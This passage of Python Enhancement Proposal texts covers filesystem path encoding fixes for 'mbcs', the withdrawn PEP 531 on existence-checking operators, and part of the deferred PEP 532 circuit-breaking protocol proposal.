>>> text = open(filename, 'r').read()
To correct this code, the encoding of the bytes in filename should be
specified, either when reading from the file or before using the value:
>>> # Fix 1: Open file as text (default encoding)
>>> filename = open('filename_in_mbcs.txt', 'r').read()
>>> text = open(filename, 'r').read()
>>> # Fix 2: Open file as text (explicit encoding)
>>> filename = open('filename_in_mbcs.txt', 'r', encoding='mbcs').read()
>>> text = open(filename, 'r').read()
>>> # Fix 3: Explicitly decode the path
>>> filename = open('filename_in_mbcs.txt', 'rb').read()
>>> text = open(filename.decode('mbcs'), 'r').read()
Where the creator of filename is separated from the user of filename,
the encoding is important information to include:
>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'.encode('mbcs')
>>> filename = some_object.filename
>>> type(filename)
<class 'bytes'>
>>> text = open(filename, 'r').read()
To fix this code for best compatibility across operating systems and Python
versions, the filename should be exposed as str:
>>> # Fix 1: Expose as str
>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'
>>> filename = some_object.filename
>>> type(filename)
<class 'str'>
>>> text = open(filename, 'r').read()
Alternatively, the encoding used for the path needs to be made available to the
user. Specifying os.fsencode() (or sys.getfilesystemencoding()) is an
acceptable choice, or a new attribute could be added with the exact encoding:
>>> # Fix 2: Use fsencode
>>> some_object.filename = os.fsencode(r'C:\Users\Steve\Documents\my_file.txt')
>>> filename = some_object.filename
>>> type(filename)
<class 'bytes'>
>>> text = open(filename, 'r').read()
>>> # Fix 3: Expose as explicit encoding
>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'.encode('cp437')
>>> some_object.filename_encoding = 'cp437'
>>> filename = some_object.filename
>>> type(filename)
<class 'bytes'>
>>> filename = filename.decode(some_object.filename_encoding)
>>> type(filename)
<class 'str'>
>>> text = open(filename, 'r').read()
Explicitly using ‘mbcs’
Code that explicitly encodes text using ‘mbcs’ before passing to file system
APIs is now passing incorrectly encoded bytes. Note that the source of
filename in this example is not relevant, provided that it is a str:
>>> filename = open('files.txt', 'r').readline().rstrip()
>>> text = open(filename.encode('mbcs'), 'r')
To correct this code, the string should be passed without explicit encoding, or
should use os.fsencode():
>>> # Fix 1: Do not encode the string
>>> filename = open('files.txt', 'r').readline().rstrip()
>>> text = open(filename, 'r')
>>> # Fix 2: Use correct encoding
>>> filename = open('files.txt', 'r').readline().rstrip()
>>> text = open(os.fsencode(filename), 'r')
Copyright
This document has been placed in the public domain.
PEP 531 – Existence checking operators
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Withdrawn
Type:
Standards Track
Created:
25-Oct-2016
Python-Version:
3.7
Post-History:
28-Oct-2016
Table of Contents
Abstract
PEP Withdrawal
Relationship with other PEPs
Rationale
Existence checking expressions
Existence checking assignment
Existence checking protocol
Proposed symbolic notation
Proposed keywords
Risks and concerns
Readability
Magic syntax
Conceptual complexity
Design Discussion
Subtleties in chaining existence checking expressions
Ambiguous interaction with conditional expressions
Existence checking in other truth-checking contexts
Defining expected invariant relations between __bool__ and __exists__
Limitations
Arbitrary sentinel objects
Specification
Implementation
References
Copyright
Abstract
Inspired by PEP 505 and the related discussions, this PEP proposes the addition
of two new control flow operators to Python:
Existence-checking precondition (“exists-then”): expr1 ?then expr2
Existence-checking fallback (“exists-else”): expr1 ?else expr2
as well as the following abbreviations for common existence checking
expressions and statements:
Existence-checking attribute access:
obj?.attr (for obj ?then obj.attr)
Existence-checking subscripting:
obj?[expr] (for obj ?then obj[expr])
Existence-checking assignment:
value ?= expr (for value = value ?else expr)
The common ? symbol in these new operator definitions indicates that they
use a new “existence checking” protocol rather than the established
truth-checking protocol used by if statements, while loops, comprehensions,
generator expressions, conditional expressions, logical conjunction, and
logical disjunction.
This new protocol would be made available as operator.exists, with the
following characteristics:
types can define a new __exists__ magic method (Python) or
tp_exists slot (C) to override the default behaviour. This optional
method has the same signature and possible return values as __bool__.
operator.exists(None) returns False
operator.exists(NotImplemented) returns False
operator.exists(Ellipsis) returns False
float, complex and decimal.Decimal will override the existence
check such that NaN values return False and other values (including
zero values) return True
for any other type, operator.exists(obj) returns True by default. Most
importantly, values that evaluate to False in a truth checking context
(zeroes, empty containers) will still evaluate to True in an existence
checking context
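As a rough pure-Python sketch of the described default behaviour (our own illustration only; the PEP itself proposes a C-level tp_exists slot, and the exists function would live in the operator module):
import math, cmath, decimal

_MISSING = (None, NotImplemented, Ellipsis)

def exists(obj):
    # Honour an __exists__ override if the type defines one
    exists_method = getattr(type(obj), '__exists__', None)
    if exists_method is not None:
        return bool(exists_method(obj))
    # The three placeholder singletons do not "exist"
    if any(obj is sentinel for sentinel in _MISSING):
        return False
    # NaN values do not "exist", but zero values do
    if isinstance(obj, float):
        return not math.isnan(obj)
    if isinstance(obj, complex):
        return not cmath.isnan(obj)
    if isinstance(obj, decimal.Decimal):
        return not obj.is_nan()
    return True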
PEP Withdrawal
When posting this PEP for discussion on python-ideas [4], I asked reviewers to
consider 3 high level design questions before moving on to considering the
specifics of this particular syntactic proposal:
1. Do we collectively agree that “existence checking” is a useful
general concept that exists in software development and is distinct
from the concept of “truth checking”?
2. Do we collectively agree that the Python ecosystem would benefit
from an existence checking protocol that permits generalisation of
algorithms (especially short circuiting ones) across different “data
missing” indicators, including those defined in the language
definition, the standard library, and custom user code?
3. Do we collectively agree that it would be easier to use such a
protocol effectively if existence-checking equivalents to the
truth-checking “and” and “or” control flow operators were available?
While the answers to the first question were generally positive, it quickly
became clear that the answer to the second question is “No”.
Steven D’Aprano articulated the counter-argument well in [5], but the general
idea is that when checking for “missing data” sentinels, we’re almost always
looking for a specific sentinel value, rather than any sentinel value.
NotImplemented exists, for example, due to None being a potentially
legitimate result from overloaded arithmetic operators and exception
handling imposing too much runtime overhead to be useful for operand coercion.
Similarly, Ellipsis exists for multi-dimensional slicing support due to
None already having another meaning in a slicing context (indicating the use
of the default start or stop indices, or the default step size).
In mathematics, the value of NaN is that programmatically it behaves
like a normal value of its type (e.g. exposing all the usual attributes and
methods), while arithmetically it behaves according to the mathematical rules
for handling NaN values.
With that core design concept invalidated, the proposal as a whole doesn’t
make sense, and it is accordingly withdrawn.
However, the discussion of the proposal did prompt consideration of a potential
protocol based approach to make the existing and, or and if-else
operators more flexible [6] without introducing any new syntax, so I’ll be
writing that up as another possible alternative to PEP 505.
Relationship with other PEPs
While this PEP was inspired by and builds on Mark Haase’s excellent work in
putting together PEP 505, it ultimately competes with that PEP due to
significant differences in the specifics of the proposed syntax and semantics
for the feature.
It also presents a different perspective on the rationale for the change by
focusing on the benefits to existing Python users as the typical demands of
application and service development activities are genuinely changing. It
isn’t an accident that similar features are now appearing in multiple
programming languages, and while it’s a good idea for us to learn from how other
language designers are handling the problem, precedents being set elsewhere
are more relevant to how we would go about tackling this problem than they
are to whether or not we think it’s a problem we should address in the first
place.
Rationale
Existence checking expressions
An increasingly common requirement in modern software development is the need
to work with “semi-structured data”: data where the structure of the data is
known in advance, but pieces of it may be missing at runtime, and the software
manipulating that data is expected to degrade gracefully (e.g. by omitting
results that depend on the missing data) rather than failing outright.
Some particularly common cases where this issue arises are:
handling optional application configuration settings and function parameters
handling external service failures in distributed systems
handling data sets that include some partial records
It is the latter two cases that are the primary motivation for this PEP - while
needing to deal with optional configuration settings and parameters is a design
requirement at least as old as Python itself, the rise of public cloud
infrastructure, the development of software systems as collaborative networks
of distributed services, and the availability of large public and private data
sets for analysis means that the ability to degrade operations gracefully in
the face of partial service failures or partial data availability is becoming
an essential feature of modern programming environments.
At the moment, writing such software in Python can be genuinely awkward, as
your code ends up littered with expressions like:
value1 = expr1.field.of.interest if expr1 is not None else None
value2 = expr2["field"]["of"]["interest"] if expr2 is not None else None
value3 = expr3 if expr3 is not None else expr4 if expr4 is not None else expr5
If these are only occasional, then expanding out to full statement forms may
help improve readability, but if you have 4 or 5 of them in a row (which is a
fairly common situation in data transformation pipelines), then replacing them
with 16 or 20 lines of conditional logic really doesn’t help matters.
Expanding the three examples above that way hopefully helps illustrate that:
if expr1 is not None:
    value1 = expr1.field.of.interest
else:
    value1 = None
if expr2 is not None:
    value2 = expr2["field"]["of"]["interest"]
else:
    value2 = None
if expr3 is not None:
    value3 = expr3
else:
    if expr4 is not None:
        value3 = expr4
    else:
        value3 = expr5
The combined impact of the proposals in this PEP is to allow the above sample
expressions to instead be written as:
value1 = expr1?.field.of.interest
value2 = expr2?["field"]["of"]["interest"]
value3 = expr3 ?else expr4 ?else expr5
In these forms, almost all of the information presented to the reader is
immediately relevant to the question “What does this code do?”, while the
boilerplate code to handle missing data by passing it through to the output
or falling back to an alternative input, has shrunk to two uses of the ?
symbol and two uses of the ?else keyword.
In the first two examples, the 31 character boilerplate clause
if exprN is not None else None (minimally 27 characters for a single letter
variable name) has been replaced by a single ? character, substantially
improving the signal-to-pattern-noise ratio of the lines (especially if it
encourages the use of more meaningful variable and field names rather than
making them shorter purely for the sake of expression brevity).
In the last example, two instances of the 21 character boilerplate,
if exprN is not None (minimally 17 characters) are replaced with single
characters, again substantially improving the signal-to-pattern-noise ratio.
Furthermore, each of our 5 “subexpressions of potential interest” is included
exactly once, rather than 4 of them needing to be duplicated or pulled out
to a named variable in order to first check if they exist.
The existence checking precondition operator is mainly defined to provide a
clear conceptual basis for the existence checking attribute access and
subscripting operators:
obj?.attr is roughly equivalent to obj ?then obj.attr
obj?[expr] is roughly equivalent to obj ?then obj[expr]
The main semantic difference between the shorthand forms and their expanded
equivalents is that the common subexpression to the left of the existence
checking operator is evaluated only once in the shorthand form (similar to
the benefit offered by augmented assignment statements).
Existence checking assignment
Existence-checking assignment is proposed as a relatively straightforward
expansion of the concepts in this PEP to also cover the common configuration
handling idiom:
value = value if value is not None else expensive_default()
by allowing that to instead be abbreviated as:
value ?= expensive_default()
This is mainly beneficial when the target is a subscript operation or
subattribute, as even without this specific change, the PEP would still
permit this idiom to be updated to:
value = value ?else expensive_default()
The main argument against adding this form is that it’s arguably ambiguous
and could mean either:
value = value ?else expensive_default(); or
value = value ?then value.subfield.of.interest
The second form isn’t at all useful, but if this concern was deemed significant
enough to address while still keeping the augmented assignment feature,
the full keyword could be included in the syntax:
value ?else= expensive_default()
Alternatively, augmented assignment could just be dropped from the current
proposal entirely and potentially reconsidered at a later date.
Existence checking protocol
The existence checking protocol is included in this proposal primarily to
allow for proxy objects (e.g. local representations of remote resources) and
mock objects used in testing to correctly indicate non-existence of target
resources, even though the proxy or mock object itself is not None.
However, with that protocol defined, it then seems natural to expand it to
provide a type independent way of checking for NaN values in numeric types
- at the moment you need to be aware of the exact data type you’re working with
(e.g. builtin floats, builtin complex numbers, the decimal module) and use the
appropriate operation (e.g. math.isnan, cmath.isnan,
decimal.getcontext().is_nan(), respectively)
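The type-specific status quo the PEP refers to looks like this today:
>>> import math, cmath, decimal
>>> math.isnan(float('nan'))
True
>>> cmath.isnan(complex('nan'))
True
>>> decimal.getcontext().is_nan(decimal.Decimal('NaN'))
True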
Similarly, it seems reasonable to declare that the other placeholder builtin
singletons, Ellipsis and NotImplemented, also qualify as objects that
represent the absence of data more so than they represent data.
Proposed symbolic notation
Python has historically only had one kind of implied boolean context: truth
checking, which can be invoked directly via the bool() builtin. As this PEP
proposes a new kind of control flow operation based on existence checking rather
than truth checking, it is considered valuable to have a reminder directly
in the code when existence checking is being used rather than truth checking.
The mathematical symbol for existence assertions is U+2203 ‘THERE EXISTS’: ∃
Accordingly, one possible approach to the syntactic additions proposed in this
PEP would be to use that already defined mathematical notation:
expr1 ∃then expr2
expr1 ∃else expr2
obj∃.attr
obj∃[expr]
target ∃= expr
However, there are two major problems with that approach, one practical, and
one pedagogical.
The practical problem is the usual one that most keyboards don’t offer any easy
way of entering mathematical symbols other than those used in basic arithmetic
(even the symbols appearing in this PEP were ultimately copied & pasted
from [3] rather than being entered directly).
The pedagogical problem is that the symbols for existence assertions (∃)
and universal assertions (∀) aren’t going to be familiar to most people
the way basic arithmetic operators are, so we wouldn’t actually be making the
proposed syntax easier to understand by adopting ∃.
By contrast, ? is one of the few remaining unused ASCII punctuation
characters in Python’s syntax, making it available as a candidate syntactic
marker for “this control flow operation is based on an existence check, not a
truth check”.
Taking that path would also have the advantage of aligning Python’s syntax
with corresponding syntax in other languages that offer similar features.
Drawing from the existing summary in PEP 505 and the Wikipedia articles on
the “safe navigation operator” [1] and the “null coalescing operator” [2],
we see:
The ?. existence checking attribute access syntax precisely aligns with:
the “safe navigation” attribute access operator in C# (?.)
the “optional chaining” operator in Swift (?.)
the “safe navigation” attribute access operator in Groovy (?.)
the “conditional member access” operator in Dart (?.)
The ?[] existence checking subscript syntax precisely aligns with:
the “safe navigation” subscript operator in C# (?[])
the “optional subscript” operator in Swift (?[])
The ?else existence checking fallback syntax semantically aligns with:
the “null-coalescing” operator in C# (??)
the “null-coalescing” operator in PHP (??)
the “nil-coalescing” operator in Swift (??)
To be clear, these aren’t the only spelling of these operators used in other
languages, but they’re the most common ones, and the ? symbol is the most
common syntactic marker by far (presumably prompted by the use of ? to
introduce the “then” clause in C-style conditional expressions, which many
of these languages also offer).
Proposed keywords
Given the symbolic marker ?, it would be syntactically unambiguous to spell
the existence checking precondition and fallback operations using the same
keywords as their truth checking counterparts:
expr1 ?and expr2 (instead of expr1 ?then expr2)
expr1 ?or expr2 (instead of expr1 ?else expr2)
However, while syntactically unambiguous when written, this approach makes
the code incredibly hard to pronounce (What’s the pronunciation of “?”?) and
also hard to describe (given reused keywords, there’s no obvious shorthand
terms for “existence checking precondition (?and)” and “existence checking
fallback (?or)” that would distinguish them from “logical conjunction (and)”
and “logical disjunction (or)”).
We could try to encourage folks to pronounce the ? symbol as “exists”,
making the shorthand names the “exists-and expression” and the
“exists-or expression”, but there’d be no way of guessing those names purely
from seeing them written in a piece of code.
Instead, this PEP takes advantage of the proposed symbolic syntax to introduce
a new keyword (?then) and borrow an existing one (?else) in a way
that allows people to refer to “then expressions” and “else expressions”
without ambiguity.
These keywords also align well with the conditional expressions that are
semantically equivalent to the proposed expressions.
For ?else expressions, expr1 ?else expr2 is equivalent to:
_lhs_result = expr1
_lhs_result if operator.exists(_lhs_result) else expr2
Here the parallel is clear, since the else expr2 appears at the end of
both the abbreviated and expanded forms.
For ?then expressions, expr1 ?then expr2 is equivalent to:
_lhs_result = expr1
expr2 if operator.exists(_lhs_result) else _lhs_result
Here the parallel isn’t as immediately obvious due to Python’s traditionally
anonymous “then” clauses (introduced by : in if statements and suffixed
by if in conditional expressions), but it’s still reasonably clear as long
as you’re already familiar with the “if-then-else” explanation of conditional
control flow.
Risks and concerns
Readability
Learning to read and write the new syntax effectively mainly requires
internalising two concepts:
expressions containing ? include an existence check and may short circuit
if None or another “non-existent” value is an expected input, and the
correct handling is to propagate that to the result, then the existence
checking operators are likely what you want
Currently, these concepts aren’t explicitly represented at the language level,
so it’s a matter of learning to recognise and use the various idiomatic
patterns based on conditional expressions and statements.
Magic syntax
There’s nothing about ? as a syntactic element that inherently suggests
is not None or operator.exists. The main current use of ? as a
symbol in Python code is as a trailing suffix in IPython environments to
request help information for the result of the preceding expression.
However, the notion of existence checking really does benefit from a pervasive
visual marker that distinguishes it from truth checking, and that calls for
a single-character symbolic syntax if we’re going to do it at all.
Conceptual complexity
This proposal takes the currently ad hoc and informal concept of “existence
checking” and elevates it to the status of being a syntactic language feature
with a clearly defined operator protocol.
In many ways, this should actually reduce the overall conceptual complexity
of the language, as many more expectations will map correctly between truth
checking with bool(expr) and existence checking with
operator.exists(expr) than currently map between truth checking and
existence checking with expr is not None (or expr is not NotImplemented
in the context of operand coercion, or the various NaN-checking operations
in mathematical libraries).
As a simple example of the new parallels introduced by this PEP, compare:
all_are_true = all(map(bool, iterable))
at_least_one_is_true = any(map(bool, iterable))
all_exist = all(map(operator.exists, iterable))
at_least_one_exists = any(map(operator.exists, iterable))
Design Discussion
Subtleties in chaining existence checking expressions
Similar subtleties arise in chaining existence checking expressions as already
exist in chaining logical operators: the behaviour can be surprising if the
right hand side of one of the expressions in the chain itself returns a
value that doesn’t exist.
As a result, value = arg1 ?then f(arg1) ?else default() would be dubious for
essentially the same reason that value = cond and expr1 or expr2 is dubious:
the former will evaluate default() if f(arg1) returns None, just
as the latter will evaluate expr2 if expr1 evaluates to False in
a boolean context.
Ambiguous interaction with conditional expressions
In the proposal as currently written, the following is a syntax error:
value = f(arg) if arg ?else default
While the following is a valid operation that checks a second condition if the
first doesn’t exist rather than merely being false:
value = expr1 if cond1 ?else cond2 else expr2
The expression chaining problem described above means that the argument can be
made that the first operation should instead be equivalent to:
value = f(arg) if operator.exists(arg) else default
requiring the second to be written in the arguably clearer form:
value = expr1 if (cond1 ?else cond2) else expr2
Alternatively, the first form could remain a syntax error, and the existence
checking symbol could instead be attached to the if keyword:
value = expr1 if? cond else expr2
Existence checking in other truth-checking contexts
The truth-checking protocol is currently used in the following syntactic
constructs:
logical conjunction (and-expressions)
logical disjunction (or-expressions)
conditional expressions (if-else expressions)
if statements
while loops
filter clauses in comprehensions and generator expressions
In the current PEP, switching from truth-checking with and and or to
existence-checking is a matter of substituting in the new keywords, ?then
and ?else in the appropriate places.
For other truth-checking contexts, it proposes either importing and
using the operator.exists API, or else continuing with the current idiom
of checking specifically for expr is not None (or the context appropriate
equivalent).
The simplest possible enhancement in that regard would be to elevate the
proposed exists() API from an operator module function to a new builtin
function.
Alternatively, the ? existence checking symbol could be supported as a
modifier on the if and while keywords to indicate the use of an
existence check rather than a truth check.
However, it isn’t at all clear that the potential consistency benefits gained
for either suggestion would justify the additional disruption, so they’ve
currently been omitted from the proposal.
Defining expected invariant relations between __bool__ and __exists__
The PEP currently leaves the definition of __bool__ on all existing types
unmodified, which ensures the entire proposal remains backwards compatible,
but results in the following cases where bool(obj) returns True, but
the proposed operator.exists(obj) would return False:
NaN values for float, complex, and decimal.Decimal
Ellipsis
NotImplemented
The main argument for potentially changing these is that it becomes easier to
reason about potential code behaviour if we have a recommended invariant in
place saying that values which indicate they don’t exist in an existence
checking context should also report themselves as being False in a truth
checking context.
Failing to define such an invariant would lead to arguably odd outcomes like
float("NaN") ?else 0.0 returning 0.0 while float("NaN") or 0.0
returns NaN.
Limitations
Arbitrary sentinel objects
This proposal doesn’t attempt to provide syntactic support for the “sentinel
object” idiom, where None is a permitted explicit value, so a
separate sentinel object is defined to indicate missing values:
_SENTINEL = object()
def f(obj=_SENTINEL):
    return obj if obj is not _SENTINEL else default_value()
This could potentially be supported at the expense of making the existence
protocol definition significantly more complex, both to define and to use:
at the Python layer, operator.exists and __exists__ implementations
would return the empty tuple to indicate non-existence, and otherwise return
a singleton tuple containing a reference to the object to be used as the
result of the existence check
at the C layer, tp_exists implementations would return NULL to indicate
non-existence, and otherwise return a PyObject * pointer as the
result of the existence check
Given that change, the sentinel object idiom could be rewritten as:
class Maybe:
    SENTINEL = object()
    def __init__(self, value):
        self._result = (value,) if value is not self.SENTINEL else ()
    def __exists__(self):
        return self._result

def f(obj=Maybe.SENTINEL):
    return Maybe(obj) ?else default_value()
However, I don’t think cases where the 3 proposed standard sentinel values (i.e.
None, Ellipsis and NotImplemented) can’t be used are going to be
anywhere near common enough for the additional protocol complexity and the loss
of symmetry between __bool__ and __exists__ to be worth it.
Specification
The Abstract already gives the gist of the proposal and the Rationale gives
some specific examples. If there’s enough interest in the basic idea, then a
full specification will need to provide a precise correspondence between the
proposed syntactic sugar and the underlying conditional expressions that is
sufficient to guide the creation of a reference implementation.
…TBD…
Implementation
As with PEP 505, actual implementation has been deferred pending in-principle
interest in the idea of adding these operators - the implementation isn’t
the hard part of these proposals, the hard part is deciding whether or not
this is a change where the long term benefits for new and existing Python users
outweigh the short term costs involved in the wider ecosystem (including
developers of other implementations, language curriculum developers, and
authors of other Python related educational material) adjusting to the change.
…TBD…
References
[1]
Wikipedia: Safe navigation operator
(https://en.wikipedia.org/wiki/Safe_navigation_operator)
[2]
Wikipedia: Null coalescing operator
(https://en.wikipedia.org/wiki/Null_coalescing_operator)
[3]
FileFormat.info: Unicode Character ‘THERE EXISTS’ (U+2203)
(http://www.fileformat.info/info/unicode/char/2203/index.htm)
[4]
python-ideas discussion thread
(https://mail.python.org/pipermail/python-ideas/2016-October/043415.html)
[5]
Steven D’Aprano’s critique of the proposal
(https://mail.python.org/pipermail/python-ideas/2016-October/043453.html)
[6]
Considering a link to the idea of overloadable Boolean operators
(https://mail.python.org/pipermail/python-ideas/2016-October/043447.html)
Copyright
This document has been placed in the public domain under the terms of the
CC0 1.0 license: https://creativecommons.org/publicdomain/zero/1.0/
PEP 532 – A circuit breaking protocol and binary operators
Author:
Alyssa Coghlan <ncoghlan at gmail.com>,
Mark E. Haase <mehaase at gmail.com>
Status:
Deferred
Type:
Standards Track
Created:
30-Oct-2016
Python-Version:
3.8
Post-History:
05-Nov-2016
Table of Contents
PEP Deferral
Abstract
Relationship with other PEPs
PEP 531: Existence checking protocol
PEP 505: None-aware operators
PEP 335: Overloadable Boolean operators
PEP 535: Rich comparison chaining
Specification
The circuit breaking protocol (if-else)
Circuit breaking operators (binary if and binary else)
Overloading logical inversion (not)
Forcing short-circuiting behaviour
Circuit breaking identity comparisons (is and is not)
Truth checking comparisons
None-aware operators
Rich chained comparisons
Other conditional constructs
Style guide recommendations
Rationale
Adding new operators
Naming the operator and protocol
Using existing keywords
Naming the protocol methods
Making binary if right-associative
Naming the standard circuit breakers
Risks and concerns
Design Discussion
Protocol walk-through
Respecting De Morgan’s Laws
Arbitrary sentinel objects
Implicitly defined circuit breakers in circuit breaking expressions
Implementation
Acknowledgements
References
Copyright
PEP Deferral
Further consideration of this PEP has been deferred until Python 3.8 at the
earliest.
Abstract
Inspired by PEP 335, PEP 505, PEP 531, and the related discussions, this PEP
proposes the definition of a new circuit breaking protocol (using the
method names __then__ and __else__) that provides a common underlying
semantic foundation for:
conditional expressions: LHS if COND else RHS
logical conjunction: LHS and RHS
logical disjunction: LHS or RHS
the None-aware operators proposed in PEP 505
the rich comparison chaining model proposed in PEP 535
Taking advantage of the new protocol, it further proposes that the definition
of conditional expressions be revised to also permit the use of if and
else respectively as right-associative and left-associative general
purpose short-circuiting operators:
Right-associative short-circuiting: LHS if RHS
Left-associative short-circuiting: LHS else RHS
In order to make logical inversion (not EXPR) consistent with the above
changes, it also proposes the introduction of a new logical inversion protocol
(using the method name __not__).
To force short-circuiting of a circuit breaker without having to evaluate
the expression creating it twice, a new operator.short_circuit(obj)
helper function will be added to the operator module.
Finally, a new standard types.CircuitBreaker type is proposed to decouple
an object’s truth value (as used to determine control flow) from the value
it returns from short-circuited circuit breaking expressions, with the
following factory functions added to the operator module to represent
particularly common switching idioms:
switching on bool(obj): operator.true(obj)
switching on not bool(obj): operator.false(obj)
switching on obj is value: operator.is_sentinel(obj, value)
switching on obj is not value: operator.is_not_sentinel(obj, value)
Relationship with other PEPs
This PEP builds on an extended history of work in other proposals. Some of
the key proposals are discussed below.
PEP 531: Existence checking protocol
This PEP is a direct successor to PEP 531, replacing the existence checking
protocol and the new ?then and ?else syntactic operators defined there
with the new circuit breaking protocol and adjustments to conditional
expressions and the not operator.
PEP 505: None-aware operators
This PEP complements the None-aware operator proposals in PEP 505, by offering
an underlying protocol-driven semantic framework that explains their
short-circuiting behaviour as highly optimised syntactic sugar for particular
uses of conditional expressions.
Given the changes proposed by this PEP:
LHS ?? RHS would roughly be is_not_sentinel(LHS, None) else RHS
EXPR?.attr would roughly be EXPR.attr if is_not_sentinel(EXPR, None)
EXPR?[key] would roughly be EXPR[key] if is_not_sentinel(EXPR, None)
In all three cases, the dedicated syntactic form would be optimised to avoid
actually creating the circuit breaker instance and instead implement the
underlying control flow directly. In the latter two cases, the syntactic form
would also avoid evaluating EXPR twice.
This means that while the None-aware operators would remain highly specialised
and specific to None, other sentinel values would still be usable through the
more general protocol-driven proposal in this PEP.
PEP 335: Overloadable Boolean operators
PEP 335 proposed the ability to overload the short-circuiting and and
or operators directly, with the ability to overload the semantics of
comparison chaining being one of the consequences of that change. The
proposal in an earlier version of this PEP to instead handle the element-wise
comparison use case by changing the semantic definition of comparison chaining
is drawn directly from Guido’s rejection of PEP 335 [1].
However, initial feedback on this PEP indicated that the number of different
proposals that it covered made it difficult to read, so that part of the
proposal has been separated out as PEP 535.
PEP 535: Rich comparison chaining
As noted above, PEP 535 is a proposal to build on the circuit breaking protocol
defined in this PEP in order to expand the rich comparison support introduced
in PEP 207 to also handle comparison chaining operations like
LEFT_BOUND < VALUE < RIGHT_BOUND.
Specification
The circuit breaking protocol (if-else)
Conditional expressions (LHS if COND else RHS) are currently interpreted
as an expression level equivalent to:
if COND:
    _expr_result = LHS
else:
    _expr_result = RHS
This PEP proposes changing that expansion to allow the checked condition to
implement a new “circuit breaking” protocol that allows it to see, and
potentially alter, the result of either or both branches of the expression:
_cb = COND
_type_cb = type(_cb)
if _cb:
    _expr_result = LHS
    if hasattr(_type_cb, "__then__"):
        _expr_result = _type_cb.__then__(_cb, _expr_result)
else:
    _expr_result = RHS
    if hasattr(_type_cb, "__else__"):
        _expr_result = _type_cb.__else__(_cb, _expr_result)
As shown, interpreter implementations would be required to access only the
protocol method needed for the branch of the conditional expression that is
actually executed. Consistent with other protocol methods, the special methods
would be looked up via the circuit breaker’s type, rather than directly on the
instance.
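As a purely illustrative sketch (none of these names are part of the proposal or
the standard library), the expansion above can be emulated in current Python by
passing each branch as a zero-argument callable so that only the selected branch
is evaluated:
def eval_conditional(cond, then_thunk, else_thunk):
    # Emulation of the proposed expansion: the hooks are looked up on the
    # condition's type, and only invoked when they are actually defined.
    cb_type = type(cond)
    if cond:
        result = then_thunk()
        then_hook = getattr(cb_type, "__then__", None)
        if then_hook is not None:
            result = then_hook(cond, result)
    else:
        result = else_thunk()
        else_hook = getattr(cb_type, "__else__", None)
        if else_hook is not None:
            result = else_hook(cond, result)
    return result
For objects that don't define the new hooks, eval_conditional(cond, lambda: a,
lambda: b) behaves exactly like the existing a if cond else b.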
Circuit breaking operators (binary if and binary else)
The proposed name of the protocol doesn’t come from the proposed changes to
the semantics of conditional expressions. Rather, it comes from the proposed
addition of if and else as general purpose protocol driven
short-circuiting operators to complement the existing True and False
based short-circuiting operators (or and and, respectively) as well
as the None based short-circuiting operator proposed in PEP 505 (??).
Together, these two operators would be known as the circuit breaking operators.
In order to support this usage, the definition of conditional expressions in
the language grammar would be updated to make both the if clause and
the else clause optional:
test: else_test ['if' or_test ['else' test]] | lambdef
else_test: or_test ['else' test]
Note that we would need to avoid the apparent simplification to
else_test ('if' else_test)* in order to make it easier for compiler
implementations to correctly preserve the semantics of normal conditional
expressions.
The definition of the test_nocond node in the grammar (which deliberately
excludes conditional expressions) would remain unchanged, so the circuit
breaking operators would require parentheses when used in the if
clause of comprehensions and generator expressions just as conditional
expressions themselves do.
This grammar definition means precedence/associativity in the otherwise
ambiguous case of expr1 if cond else expr2 else expr3 resolves as
(expr1 if cond else expr2) else expr3. However, a guideline will also be
added to PEP 8 to say “don’t do that”, as such a construct will be inherently
confusing for readers, regardless of how the interpreter executes it.
The right-associative circuit breaking operator (LHS if RHS) would then
be expanded as follows:
_cb = RHS
_expr_result = LHS if _cb else _cb
While the left-associative circuit breaking operator (LHS else RHS) would
be expanded as:
_cb = LHS
_expr_result = _cb if _cb else RHS
The key point to note in both cases is that when the circuit breaking
expression short-circuits, the condition expression is used as the result of
the expression unless the condition is a circuit breaker. In the latter
case, the appropriate circuit breaker protocol method is called as usual, but
the circuit breaker itself is supplied as the method argument.
This allows circuit breakers to reliably detect short-circuiting by checking
for cases when the argument passed in as the candidate expression result is
self.
Overloading logical inversion (not)
Any circuit breaker definition will have a logical inverse that is still a
circuit breaker, but inverts the answer as to when to short circuit the
expression evaluation. For example, the operator.true and
operator.false circuit breakers proposed in this PEP are each other’s
logical inverse.
A new protocol method, __not__(self), will be introduced to permit circuit
breakers and other types to override not expressions to return their
logical inverse rather than a coerced boolean result.
To preserve the semantics of existing language optimisations (such as
eliminating double negations directly in a boolean context as redundant),
__not__ implementations will be required to respect the following
invariant:
assert (not bool(obj)) == bool(not obj)
However, symmetric circuit breakers (those that implement all of __bool__,
__not__, __then__ and __else__) would only be expected to respect
the full semantics of boolean logic when all circuit breakers involved in the
expression are using a consistent definition of “truth”. This is covered
further in Respecting De Morgan’s Laws.
Forcing short-circuiting behaviour
Invocation of a circuit breaker’s short-circuiting behaviour can be forced by
using it as all three operands in a conditional expression:
obj if obj else obj
Or, equivalently, as both operands in a circuit breaking expression:
obj if obj
obj else obj
Rather than requiring the use of any of these patterns, this PEP proposes
to add a dedicated function to the operator module to explicitly short-circuit
a circuit breaker, while passing other objects through unmodified:
def short_circuit(obj):
    """Replace circuit breakers with their short-circuited result

    Passes other input values through unmodified.
    """
    return obj if obj else obj
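Since that definition relies on the new operator semantics, a rough
current-Python approximation (illustrative only) would perform the protocol
dispatch by hand:
def short_circuit(obj):
    """Replace circuit breakers with their short-circuited result.

    Passes other input values through unmodified; this sketch looks the hooks
    up manually instead of relying on the proposed operators.
    """
    cb_type = type(obj)
    if obj:
        hook = getattr(cb_type, "__then__", None)
    else:
        hook = getattr(cb_type, "__else__", None)
    return hook(obj, obj) if hook is not None else obj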
Circuit breaking identity comparisons (is and is not)
In the absence of any standard circuit breakers, the proposed if and
else operators would largely just be unusual spellings of the existing
and and or logical operators.
However, this PEP further proposes to provide a new general purpose
types.CircuitBreaker type that implements the appropriate short
circuiting logic, as well as factory functions in the operator module
that correspond to the is and is not operators.
These would be defined in such a way that the following expressions produce
VALUE rather than False when the conditional check fails:
EXPR if is_sentinel(VALUE, SENTINEL)
EXPR if is_not_sentinel(VALUE, SENTINEL)
And similarly, these would produce VALUE rather than True when the
conditional check succeeds:
is_sentinel(VALUE, SENTINEL) else EXPR
is_not_sentinel(VALUE, SENTINEL) else EXPR
In effect, these comparisons would be defined such that the leading
